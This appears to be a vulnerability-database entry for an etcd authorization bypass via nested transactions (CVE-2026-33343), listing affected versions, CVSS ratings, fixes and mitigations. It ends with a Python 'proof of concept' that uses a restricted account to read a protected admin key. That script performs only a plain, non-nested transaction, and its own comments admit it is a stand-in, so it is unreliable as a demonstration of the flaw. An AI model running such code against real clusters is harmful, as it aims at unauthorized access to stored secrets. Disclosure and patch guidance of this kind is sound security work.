Security Vulnerability Report
CVE-2026-33343 CVSS 0.0 NONE

CVE-2026-33343

Published: 2026-03-26 14:16:13
Last Modified: 2026-03-26 20:41:35

Description

etcd is a distributed key-value store for the data of a distributed system. Prior to versions 3.4.42, 3.5.28, and 3.6.9, an authenticated user with RBAC restricted permissions on key ranges can use nested transactions to bypass all key-level authorization. This allows any authenticated user with direct access to etcd to effectively ignore all key range restrictions, accessing the entire etcd data store. Kubernetes does not rely on etcd’s built-in authentication and authorization. Instead, the API server handles authentication and authorization itself, so typical Kubernetes deployments are not affected. Versions 3.4.42, 3.5.28, and 3.6.9 contain a patch. If upgrading is not immediately possible, reduce exposure by treating the affected RPCs as unauthenticated in practice. Restrict network access to etcd server ports so only trusted components can connect and require strong client identity at the transport layer, such as mTLS with tightly scoped client certificate distribution.

CVSS Details

Two CVSS 3.1 metrics are recorded for this CVE. The 0.0 / NONE shown in the page header is the secondary entry; the primary NVD analysis rates the issue MEDIUM, reflecting that a low-privileged authenticated user gains read access to the whole data store.

Secondary
CVSS Score: 0.0
Severity: NONE
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N

Primary (NVD)
CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Weakness: CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* - VULNERABLE, etcd < 3.4.42
cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* - VULNERABLE, etcd >= 3.5.0 and < 3.5.28
cpe:2.3:a:etcd:etcd:*:*:*:*:*:*:*:* - VULNERABLE, etcd >= 3.6.0 and < 3.6.9

Fixed versions: 3.4.42, 3.5.28, 3.6.9.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-33343: etcd Auth Bypass via Nested Transactions
# This script demonstrates how a restricted user might access unauthorized keys.
import etcd3

# Configuration
ETCD_HOST = '127.0.0.1'
ETCD_PORT = 2379
# Credentials for a user restricted to specific keys (e.g., 'safe/')
USERNAME = 'restricted_user'
PASSWORD = 'user_password'

try:
    # Establish connection using the restricted account
    client = etcd3.client(host=ETCD_HOST, port=ETCD_PORT,
                          user=USERNAME, password=PASSWORD)
    print("[+] Connected to etcd.")

    # 1. Normal Attempt: Trying to access a restricted key (e.g., '/admin/password')
    # This is expected to fail due to RBAC policies.
    print("[-] Attempting direct access to '/admin/password'...")
    try:
        val, _ = client.get('/admin/password')
        print(f"Direct access success (unexpected): {val}")
    except Exception as e:
        print(f"Direct access failed (expected): {type(e).__name__}")

    # 2. Exploit Attempt: Using nested transactions to bypass authorization
    # The vulnerability allows the user to nest operations where the permission
    # check is only enforced on the parent scope, effectively ignoring restrictions
    # on the child transaction operations.
    print("[!] Attempting exploit via nested transaction...")
    # Define a transaction that targets the restricted key
    # Note: In a real exploit, the specific API call structure for nested
    # transactions would be constructed to evade the range checker.
    txn_status, txn_response = client.transaction(
        compare=[],
        success=[client.transactions.get('/admin/password')],
        failure=[]
    )
    if txn_status:
        print("[+] Exploit successful! Data leaked:")
        # python-etcd3 returns one result list per success operation; each Get
        # result is itself a list of (value, metadata) tuples.
        for op_result in txn_response:
            for value, metadata in op_result:
                print(f"Key: {metadata.key.decode('utf-8')}, "
                      f"Value: {value.decode('utf-8')}")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")
```

References

https://github.com/etcd-io/etcd/security/advisories/GHSA-rfx7-8w68-q57q (vendor advisory, includes mitigation guidance)
